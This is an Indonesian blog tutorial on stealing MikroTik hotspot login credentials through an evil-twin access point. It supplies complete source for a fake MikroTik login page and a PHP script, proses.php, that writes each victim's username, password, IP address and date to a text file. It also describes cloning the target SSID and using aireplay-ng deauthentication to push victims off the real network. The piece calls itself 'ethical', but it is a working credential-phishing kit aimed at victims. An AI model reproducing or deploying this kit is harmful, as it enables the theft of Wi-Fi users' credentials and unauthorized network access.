Contoh hacking password login hotspot mikrotik dengan cara seperti linset / fluxion tapi tanpa konfirmasi password secara ethical

Pertama siapkan 3 hal di bawah ini

1. Router Mikrotik yang sudah diset router

2. Access Point

3. Laptop

Di Mikrotik router set seperti di bawah ini (Kondisi sudah diset router sebelumnya).

Lalu set seperti di bawah ini

Setelah itu klik OK

Setelah itu buat web proxy dengan set seperti di atas

Diasumsikan ip 192.168.1.9 adalah ip laptop kita yang diinstall xampp

DHCP Server bisa dari router mikrotik atau access point

 

Source code index.php untuk halaman login mikrotik

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>internet hotspot > login</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="pragma" content="no-cache" />
<meta http-equiv="expires" content="-1" />
<meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0;"/>
<style type="text/css">
body {color: #737373; font-size: 10px; font-family: verdana;}

textarea,input,select {
background-color: #FDFBFB;
border: 1px solid #BBBBBB;
padding: 2px;
margin: 1px;
font-size: 14px;
color: #808080;
}

a, a:link, a:visited, a:active { color: #AAAAAA; text-decoration: none; font-size: 10px; }
a:hover { border-bottom: 1px dotted #c1c1c1; color: #AAAAAA; }
img {border: none;}
td { font-size: 14px; color: #7A7A7A; }
</style>

</head>

<body>
<form name="sendin" action="$(link-login-only)" method="post">
</form>

<script type="text/javascript" src="/md5.js"></script>
<script type="text/javascript">
<!--
function doLogin() {
document.sendin.username.value = document.login.username.value;
document.sendin.password.value = hexMD5('$(chap-id)' + document.login.password.value + '$(chap-challenge)');
document.sendin.submit();
return false;
}
//-->
</script>
<div align="center">
<a href="$(link-login-only)?target=lv&amp;dst=$(link-orig-esc)"></a></div>

<table width="100%" style="margin-top: 10%;">
<tr>
<td align="center" valign="middle">
<div class="notice" style="color: #c1c1c1; font-size: 9px">Please log on to use the internet hotspot service<br />
</div>
<br />
<table width="280" height="280" style="border: 1px solid #cccccc; padding: 0px;" cellpadding="0" cellspacing="0">
<tr>
<td align="center" valign="bottom" height="175" colspan="2">
<form name="login" action="proses.php" method="post"
$(if chap-id) onSubmit="return doLogin()" $(endif)>
<input type="hidden" name="dst" value="$(link-orig)" />
<input type="hidden" name="popup" value="true" />

<table width="100" style="background-color: #ffffff">
<tr><td align="right">login</td>
<td><input style="width: 80px" name="username" type="text"/></td>
</tr>
<tr><td align="right">password</td>
<td><input style="width: 80px" name="password" type="password"/></td>
</tr>
<tr><td>&nbsp;</td>
<td><input type="submit" value="OK" /></td>
</tr>
</table>
</form>
</td>
</tr>
<tr><td align="center"><a href="http://www.mikrotik.com" target="_blank" style="border: none;"><img src="img/logobottom.png" alt="mikrotik" /></a></td></tr>
</table>

<br /><div style="color: #c1c1c1; font-size: 9px">Powered by MikroTik RouterOS</div>
<br />
<div style="color: #FF8080; font-size: 9px"></div>
</td>
</tr>
</table>

<script type="text/javascript">
<!--
document.login.username.focus();
//-->
</script>
</body>
</html>

 

Source code proses.php

<?php $file = "mikrotik.txt";
$username = $_POST['username'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
$handle = fopen($file, 'a');
fwrite($handle, "-------------------------------------------------- ++");
fwrite($handle, "\n");
fwrite($handle, "Username login mikrotik: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password login mikrotik: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "\n");
fwrite($handle, "-------------------------------------------------- ++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
echo "<script LANGUAGE=\"JavaScript\">
<!--
window.location=\"http://192.168.1.9/login.php";
</script>";
?>

 

Setting access point yang asli

 

Di bawah ini diasumsikan setting access point palsu, nama SSID nya sama

Wireless Network Name nya XcodeTrainingData

 

Di atas diasumsikan adalah access point asli yang dijadikan target

Jika targetnya access point menggunakan WPA-PSK dan access point palsu kita disabled security (Tidak menggunakan WPA/WPA2 atau WEP.) maka akan muncul 2 access point dengan nama SSID sama, perbedaannya pada simbol tanda seru jika tidak ada keamanannya saat di lihat di Wireless Network Connection.

Di atas saat 2 AP dengan SSID sama tapi satunya di posisi disabled security tapi di satunya ada proteksi WPA/WPA2  Personal.

 

Jika sama-sama disabled security-nya maka SSID nya hanya satu yang terdeteksi, percobaan yang dilakukan saya PC yang terpasang wireless USB adapter, posisinya dekat dengan access point asli maka yang terkoneksi justru yang asli, bukan yang access point palsu dengan nama SSID sama.

Jika kondisinya korban terkoneksi dengan access point asli maka bisa dicoba memutus koneksi antara komputer korban dengan access point asli menggunakan aireplay-ng, caranya banyak di google, harapannya saat si korban tidak terkoneksi dan pindah tempat dan posisinya dekat dengan access point palsu dan terkoneksi dengan akses point palsu maka korban bisa masuk pada jebakan attacker.

Di sisi berbeda, saat laptop saya dekatkan dengan access point palsu dan melakukan koneksi ke XcodeTrainingData hasilnya seperti di bawah ini, yang artinya laptop saya terkoneksi dengan access palsu.

Saya dapat ip 192.168.1.104, terkoneksi ke access point palsu

 

Jika saya akses facebook.com

 

Hasilnya halaman login mikrotik palsu, kemudian dicoba login

 

Di komputer attacker hasilnya seperti di atas jika dibuka file mikrotik.txt

 

Penulis : Kurniawan (Founder X-code) – kurniawanajazenfone@gmail.com

One thought on “Contoh hacking password login hotspot mikrotik dengan cara seperti linset / fluxion tapi tanpa konfirmasi password secara ethical”

Leave a Reply

Your email address will not be published. Required fields are marked *